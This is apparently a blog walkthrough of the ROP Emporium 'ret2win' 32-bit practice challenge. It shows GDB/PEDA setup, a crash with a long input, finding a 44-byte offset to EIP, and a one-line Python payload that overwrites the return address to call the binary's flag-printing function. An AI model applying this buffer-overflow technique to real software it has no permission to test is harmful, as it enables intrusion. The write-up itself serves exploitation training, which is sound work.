Before you proceed any further, make sure you have all the requirements fulfilled.
ASM knowledge
Debugger familiarity
GDB
Basic ROP knowledge
Brain
Setup
In this post, we will try to learn ROP (Return Oriented Programming) by using ropemporium ret2win 32bit binary. Lets setup our machine for debugging by installing PEDA and downloading the target binary.
root@kali:~/Desktop# cd ~/
root@kali:~# git clone https://github.com/longld/peda
Cloning into 'peda'...
remote: Counting objects: 324, done.
remote: Total 324 (delta 0), reused 0 (delta 0), pack-reused 324
Receiving objects: 100% (324/324), 243.64 KiB | 111.00 KiB/s, done.
Resolving deltas: 100% (206/206), done.
root@kali:~# echo "source ~/peda/peda.py" > .gdbinit
root@kali:~# cd Desktop/
root@kali:~/Desktop# mkdir ropemporium
root@kali:~/Desktop# cd ropemporium/
root@kali:~/Desktop/ropemporium# mkdir ret2win
root@kali:~/Desktop/ropemporium# cd ret2win/
root@kali:~/Desktop/ropemporium/ret2win# wget https://ropemporium.com/binary/ret2win32.zip
--2017-09-06 07:51:50-- https://ropemporium.com/binary/ret2win32.zip
Resolving ropemporium.com (ropemporium.com)... 54.192.219.105, 54.192.219.101, 54.192.219.149, ...
Connecting to ropemporium.com (ropemporium.com)|54.192.219.105|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3374 (3.3K) [application/octet-stream]
Saving to: ‘ret2win32.zip’
ret2win32.zip 100%[================================================================================================================>] 3.29K --.-KB/s in 0s
2017-09-06 07:51:51 (25.9 MB/s) - ‘ret2win32.zip’ saved [3374/3374]
root@kali:~/Desktop/ropemporium/ret2win# unzip ret2win32.zip
Archive: ret2win32.zip
inflating: ret2win32
extracting: flag.txt
root@kali:~/Desktop/ropemporium/ret2win#
We have downloaded the binary and extracted it, time to start gdb.
Crash
root@kali:~/Desktop/ropemporium/ret2win# python -c 'print "A" *200' > ret_payload
root@kali:~/Desktop/ropemporium/ret2win# ./ret2win32 < ret_payload
ret2win by ROP Emporium
32bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> Segmentation fault
root@kali:~/Desktop/ropemporium/ret2win# gdb -q ret2win32
Reading symbols from ret2win32...(no debugging symbols found)...done.
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x08048400 printf@plt
0x08048410 fgets@plt
0x08048420 puts@plt
0x08048430 system@plt
............................
0x0804857b main
0x080485f6 pwnme
0x08048659 ret2win
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
gdb-peda$ run < ret_payload
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ run
Starting program: /root/Desktop/ropemporium/ret2win/ret2win32
ret2win by ROP Emporium
32bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
We have found the offset at 44 which means that the EIP will hold the next 4bytes. We will use a custom boiler plate to ease our exploit development for this binary which can be found in the final exploit.
Flag
This binary is pretty easy to exploit since it imports the system function and has the ‘/bin/cat flag.txt’ string inside the data section. Lets analyze this binary in a disassembler, I will be using Hopper Disassembler for this however you can simply type ‘pdisass ret2win‘ inside gdb to view the same results.
We can see that the ret2win function in this binary itself pushes the memory address of string ‘/bin/cat flag.txt’ to stack and then calls the system() which is indeed very helpful for our objective. We will simply point our return pointer to the start of our ret2win function and be done with it.
root@kali:~/Desktop/ropemporium/ret2win# python -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
ret2win by ROP Emporium
32bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
Segmentation fault
We got the flag which is the main objective. I tried to find a way to spawn a shell but didn’t found any useful rop gadgets to do so, our input is truncated after 49 bytes i guess so only 1 byte overwrite in the stack after our return pointer overwrite.
——END——